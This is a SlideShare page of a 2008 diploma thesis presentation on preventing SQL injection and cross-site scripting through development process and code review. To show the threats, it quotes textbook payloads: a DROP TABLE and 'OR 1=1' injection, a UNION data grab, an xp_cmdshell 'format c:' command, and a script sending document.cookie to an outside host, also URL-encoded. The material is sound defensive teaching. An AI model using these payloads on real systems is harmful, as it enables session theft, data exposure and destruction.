Whatever it takes
                Fixing SQLIA and XSS in the process




 Diploma Thesis Outline        Seminar “Beiträge...
OWASP Top 10 2007


1. XSS
2. Injection Flaws
3. Malicious File Execution
4. Insecure Direct Object Reference
5. Cross-Sit...
OWASP Top 10 2007


1. XSS
2. Injection Flaws
3. Malicious File Execution
4. Insecure Direct Object Reference
5. Cross-Sit...
© by xckd: http://xkcd.com/327/
© by xckd: http://xkcd.com/327/
“SELECT firstname FROM Students
  WHERE (login = ‘%s’);” % login




                       © by xckd: http://xkcd.com/327/
“SELECT firstname FROM Students
      WHERE (login = ‘%s’);” % login




                               © by xckd: http://x...
SQLIA threats

• data integrity
• confidentiality
• new attack vector
“UPDATE Users SET password = ‘%s’
  WHERE uid = ‘%s’;” % (pw, uid)
UPDATE Users SET password = ‘password’
   WHERE uid = ‘robert’ OR 1=1; --’;



           Integrity
“SELECT product FROM Products
 WHERE productid = ‘%s’;” % pid
SELECT product FROM Products
 WHERE productid = ‘0 UNION
 SELECT owner, balance FROM
        Accounts; --’;


  Confidentia...
“SELECT product, price FROM products
 WHERE category = ‘%s’;” % category
SELECT product, price FROM products
     WHERE categoryid = exec
  master..xp_cmdshell “format c:”-- ;


 New Attack Vector
Bad Mitigations

• PHP: addslashes()
• IDS blacklisting
• validation blacklisting
Decent Mitigations


stmt = prepare(“SELECT name
FROM Users WHERE uid = $1”)
db.execute(stmt, uid)
Why it’s hard


Control     Data
More problems

• validation context != execution context
• really tolerant DBs
 • “SEL”+”ECT”, anyone?
• DBs trying to fix ...
Something different!?

http://searchsite/search?
keyword=”<script>alert(‘you have
been XSSed!’)</script>”
Something different!?

http://searchsite/search?
keyword=”<script>alert(‘you have
been XSSed!’)</script>”
“This issue isn't just about scripting, and
there isn't necessarily anything cross site
about it. So why the name? It was ...
eval(‘user                   input’)1,2




1) the essence of XSS
2) limited only by the execution environment
XSS


• code injection
• popular in ECMAScript/Web2.0
Got cookies?

<script>document.location='http://
www.cgisecurity.com/cgi-bin/cookie.cgi?'
+document.cookie</script>
Got cookies?
%3c%73%63%72%69%70%74%3e%64%6f
%63%75%6d%65%6e%74%2e%6c%6f
%63%61%74%69%6f%6e%3d%27%68%74%74
%70%3a%2f%2f%77%...
The   Worm
(Non-working) XSS
     Mitigations

• blacklisting of cribs
• blacklisting of characters
helpful mitigations


• HTTPOnly cookies
• Whitelisting of characters
Common flaws

• HTML/XSS and SQL
 • mix data and control
 • have no well-defined execution
    environment
Common flaws

• HTML/XSS and SQL
 • mix data and control
 • have no well-defined execution
    environment
 • have no “API”
Failure to sanitize data
 into a different plane
Safe Query Objects

• “real” SQL API
 • adds static types
 • dynamic queries still runtime evaluated
AntiSamy

• Policy-based sanitation for HTML entities
• “Types” (by RegEx)
• (no semantics)
Another job well
    done!
GET /en-us/library/aa287673(VS.71).aspx HTTP/1.1
Host: msdn.microsoft.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac...
Hmm, are
we missing
something
  here?
Absolutely!
The interesting* part


* what my thesis is really about
Make sure that the technical
solutions are thoroughly applied
1. Make developers use a reasonable
   architecture
2. Make developers recognize a
   weakness when they meet one
3. Make ...
1) (Architecture)

• centralization
• canonicalization
• have to be conservative
2) (Recognition)


• patterns?
• flawed code examples in the wild
3) (Detection)


• automated flow analysis
• code inspection
Code inspection


• need a reading technique
 • defect-based reading
Artifacts
• reviewer annotates suspicious code regions
 • e.g. @userinput, @output
• makes review work visible in the sour...
// @userinput(data)
// [insert data into query, ignore
    non-alphanums]
def insertAlphaNum(query, data):
    // [make su...
4) (Repair)

• once weakness is known, developers should
  be motivated enough
• focus is on keeping the code secure,
  mi...
My tasks

• provide practical architectural assumptions
• construct effective reading method
 • + awareness of potential w...
Questions?
This presentation is
          licensed under a Creative
          Commons BY-SA license.
            Attribution for pict...
Thank you!
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
Upcoming SlideShare
Loading in …5
×

Whatever it takes - Fixing SQLIA and XSS in the process

2,663 views

Published on

Concept presentation about my diploma thesis. About process ideas on how to prevent SQLIA and XSS vulnerabilities in web applications

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,663
On SlideShare
0
From Embeds
0
Number of Embeds
19
Actions
Shares
0
Downloads
26
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Whatever it takes - Fixing SQLIA and XSS in the process

  1. 1. Whatever it takes Fixing SQLIA and XSS in the process Diploma Thesis Outline Seminar “Beiträge zum Software Presentation, Florian Thiel Engineering”, FU Berlin, 11/06/2008
  2. 2. OWASP Top 10 2007 1. XSS 2. Injection Flaws 3. Malicious File Execution 4. Insecure Direct Object Reference 5. Cross-Site Request Forgery
  3. 3. OWASP Top 10 2007 1. XSS 2. Injection Flaws 3. Malicious File Execution 4. Insecure Direct Object Reference 5. Cross-Site Request Forgery
  4. 4. © by xckd: http://xkcd.com/327/
  5. 5. © by xckd: http://xkcd.com/327/
  6. 6. “SELECT firstname FROM Students WHERE (login = ‘%s’);” % login © by xckd: http://xkcd.com/327/
  7. 7. “SELECT firstname FROM Students WHERE (login = ‘%s’);” % login © by xckd: http://xkcd.com/327/ SELECT firstname FROM Students WHERE (login = ‘Robert’); DROP TABLE Students; -- ‘);
  8. 8. SQLIA threats • data integrity • confidentiality • new attack vector
  9. 9. “UPDATE Users SET password = ‘%s’ WHERE uid = ‘%s’;” % (pw, uid)
  10. 10. UPDATE Users SET password = ‘password’ WHERE uid = ‘robert’ OR 1=1; --’; Integrity
  11. 11. “SELECT product FROM Products WHERE productid = ‘%s’;” % pid
  12. 12. SELECT product FROM Products WHERE productid = ‘0 UNION SELECT owner, balance FROM Accounts; --’; Confidentiality
  13. 13. “SELECT product, price FROM products WHERE category = ‘%s’;” % category
  14. 14. SELECT product, price FROM products WHERE categoryid = exec master..xp_cmdshell “format c:”-- ; New Attack Vector
  15. 15. Bad Mitigations • PHP: addslashes() • IDS blacklisting • validation blacklisting
  16. 16. Decent Mitigations stmt = prepare(“SELECT name FROM Users WHERE uid = $1”) db.execute(stmt, uid)
  17. 17. Why it’s hard Control Data
  18. 18. More problems • validation context != execution context • really tolerant DBs • “SEL”+”ECT”, anyone? • DBs trying to fix illegal SQL
  19. 19. Something different!? http://searchsite/search? keyword=”<script>alert(‘you have been XSSed!’)</script>”
  20. 20. Something different!? http://searchsite/search? keyword=”<script>alert(‘you have been XSSed!’)</script>”
  21. 21. “This issue isn't just about scripting, and there isn't necessarily anything cross site about it. So why the name? It was coined earlier on when the problem was less understood, and it stuck. Believe me, we have had more important things to do than think of a better name. <g>. “ -- Marc Slemko, Apache.org
  22. 22. eval(‘user input’)1,2 1) the essence of XSS 2) limited only by the execution environment
  23. 23. XSS • code injection • popular in ECMAScript/Web2.0
  24. 24. Got cookies? <script>document.location='http:// www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>
  25. 25. Got cookies? %3c%73%63%72%69%70%74%3e%64%6f %63%75%6d%65%6e%74%2e%6c%6f %63%61%74%69%6f%6e%3d%27%68%74%74 %70%3a%2f%2f%77%77%77%2e %63%67%69%73%65%63%75%72 %69%74%79%2e%63%6f%6d%2f%63%67%69%2d %62%69%6e %2f%63%6f%6f%6b %69%65%2e%63%67%69%3f%27%20%2b%64%6f %63%75%6d%65%6e%74%2e%63%6f%6f%6b %69%65%3c %2f%73%63%72%69%70%74%3e
  26. 26. The Worm
  27. 27. (Non-working) XSS Mitigations • blacklisting of cribs • blacklisting of characters
  28. 28. helpful mitigations • HTTPOnly cookies • Whitelisting of characters
  29. 29. Common flaws • HTML/XSS and SQL • mix data and control • have no well-defined execution environment
  30. 30. Common flaws • HTML/XSS and SQL • mix data and control • have no well-defined execution environment • have no “API”
  31. 31. Failure to sanitize data into a different plane
  32. 32. Safe Query Objects • “real” SQL API • adds static types • dynamic queries still runtime evaluated
  33. 33. AntiSamy • Policy-based sanitation for HTML entities • “Types” (by RegEx) • (no semantics)
  34. 34. Another job well done!
  35. 35. GET /en-us/library/aa287673(VS.71).aspx HTTP/1.1 Host: msdn.microsoft.com User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv: 1.9.0.3) Gecko/2008092414 Firefox/3.0.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.google.de/search?q=http+request+header +example&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en- US:official&client=firefox-a Cache-Control: max-age=0
  36. 36. Hmm, are we missing something here?
  37. 37. Absolutely!
  38. 38. The interesting* part * what my thesis is really about
  39. 39. Make sure that the technical solutions are thoroughly applied
  40. 40. 1. Make developers use a reasonable architecture 2. Make developers recognize a weakness when they meet one 3. Make developers find weaknesses 4. Make people actually fix things
  41. 41. 1) (Architecture) • centralization • canonicalization • have to be conservative
  42. 42. 2) (Recognition) • patterns? • flawed code examples in the wild
  43. 43. 3) (Detection) • automated flow analysis • code inspection
  44. 44. Code inspection • need a reading technique • defect-based reading
  45. 45. Artifacts • reviewer annotates suspicious code regions • e.g. @userinput, @output • makes review work visible in the source code • and more valuable since annotations can be reused
  46. 46. // @userinput(data) // [insert data into query, ignore non-alphanums] def insertAlphaNum(query, data): // [make sure data is canonical] c_data = data.toCharSet(...) c_data.replace(...) ... // [insert data into query] query.prepare(...) query.insert(data...) ...
  47. 47. 4) (Repair) • once weakness is known, developers should be motivated enough • focus is on keeping the code secure, minimizing effort
  48. 48. My tasks • provide practical architectural assumptions • construct effective reading method • + awareness of potential weaknesses • get a project to adopt my methods
  49. 49. Questions?
  50. 50. This presentation is licensed under a Creative Commons BY-SA license. Attribution for pictures through links. Slides, materials, progress etc. can be found @ http://www.noroute.de/blog/diplomathesis
  51. 51. Thank you!

×